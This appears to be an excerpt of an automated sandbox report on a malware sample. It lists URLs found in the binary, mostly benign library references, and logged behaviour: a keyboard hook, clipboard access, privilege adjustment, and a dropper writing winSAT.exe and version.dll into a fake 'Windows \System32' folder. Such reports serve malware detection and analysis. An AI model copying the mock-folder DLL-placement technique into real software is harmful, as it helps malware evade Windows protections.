Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1202
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1869.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1940.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/xiph/rnnoise
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/y18n
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs#supported-nodejs-versions
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs-parser#supported-nodejs-versions
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs-parser.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/zeux/volk
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/zorkow/speech-rule-engine
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.freedesktop.org/xorg/proto/xproto/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/LdLk22
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/LdLk22Media
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/LdLk22RemoveElementFromDocumentMapit
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goo.gle/chrome-insecure-origins
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hackerone.com/reports/541502
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/mozilla-central/file/tip/netwerk/base/nsURLParsers.cpp
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/comms.html#the-websocket-interface
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/server-sent-events.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/server-sent-events.html#server-sent-events.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/web-messaging.html#broadcasting-to-other-browsing-contexts
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ltp.sourceforge.net/coverage/lcov/geninfo.1.php
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://medium.com/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://no-color.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodei.co/npm/require-directory.png?downloads=true&stars=true)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodei.co/npm/require-directory/)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/permissions.html#file-system-permissions
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://npmjs.org/package/require-directory))
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://opensource.apple.com/source/xnu/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://polymer-library.polymer-project.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/pyparsing
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/six/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.python.org/pypi/pyfakefs
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.python.org/pypi/webapp2
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://quiche.googlesource.com/quiche
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://secure.travis-ci.org/troygoode/node-require-directory.png)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://semver.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2086278028.0000000004753000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shorturl.at/drFY7)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/site/gaviotachessengine/Home/endgame-tablebases-1
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sizzlejs.com/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skia.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://source.corp.google.com/piper///depot/google3/third_party/tamachiyomi/README.md
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sourceforge.net/projects/wtl/files/WTL%2010/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://streams.spec.whatwg.org/#example-manual-write-with-backpressure
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://streams.spec.whatwg.org/#example-rbs-pull
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftshader.googlesource.com/SwiftShader
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#eqn-modulo
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-HostLoadImportedModule.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-timeclip
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-tonumber
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#table-typeof-operator-results
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/security
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/security).
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-9.1
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tukaani.org/xz/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tukaani.org/xz/&gt;.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/intent/user?screen_name=troygoode)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/cliui
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/yargs-parser
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#dom-urlsearchparams-urlsearchparams
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#forbidden-host-code-point
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://v8.dev/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://v8.dev/docs/stack-trace-api#customizing-stack-traces.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://v8.dev/docs/stack-trace-api.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/FileAPI/#creating-revoking
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/aria/#aria-hidden.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/aria/#aria-hidden.Blocked
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405461
Source: YoS6ZBCcUy.exe, 00000000.00000003.2078169826.00000000069A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_a7e84da4-1

System Summary

Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile dump: NSIS.exe.0.dr 188826112
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile dump: NSIS.exe0.0.dr 188826112
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeProcess Stats: CPU usage > 49%
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF78101A42C NtDeviceIoControlFile,19_2_00007FF78101A42C
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9AE84 RtlNtStatusToDosError,NtClose,GetLastError,LoadLibraryW,GetProcAddress,GetLastError,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,19_2_00007FF780F9AE84
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9A858 RtlInitUnicodeString,NtOpenFile,RtlNtStatusToDosError,RtlNtStatusToDosError,19_2_00007FF780F9A858
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780F9AEC1 RtlNtStatusToDosError,NtClose,GetLastError,LoadLibraryW,GetProcAddress,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,22_2_00007FF780F9AEC1
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF78101A42C NtDeviceIoControlFile,22_2_00007FF78101A42C
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780F9A858 RtlInitUnicodeString,NtOpenFile,RtlNtStatusToDosError,RtlNtStatusToDosError,22_2_00007FF780F9A858
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780F9AEC1 RtlNtStatusToDosError,NtClose,GetLastError,LoadLibraryW,GetProcAddress,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,31_2_00007FF780F9AEC1
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF78101A42C NtDeviceIoControlFile,31_2_00007FF78101A42C
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780F9A858 RtlInitUnicodeString,NtOpenFile,RtlNtStatusToDosError,RtlNtStatusToDosError,31_2_00007FF780F9A858
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF78101A42C: NtDeviceIoControlFile,19_2_00007FF78101A42C
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32\winSAT.exe
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32\version.dll
Source: C:\Windows \System32\winSAT.exeFile created: C:\Windows\Performance\WinSAT\winsat.log
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess token adjusted: Security
Source: YoS6ZBCcUy.exeStatic PE information: invalid certificate
Source: NSIS.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: NSIS.exe0.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: NSIS.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: NSIS.exe0.0.drStatic PE information: Number of sections : 15 > 10
Source: YoS6ZBCcUy.exe, 00000000.00000003.2080858985.0000000004759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs YoS6ZBCcUy.exe
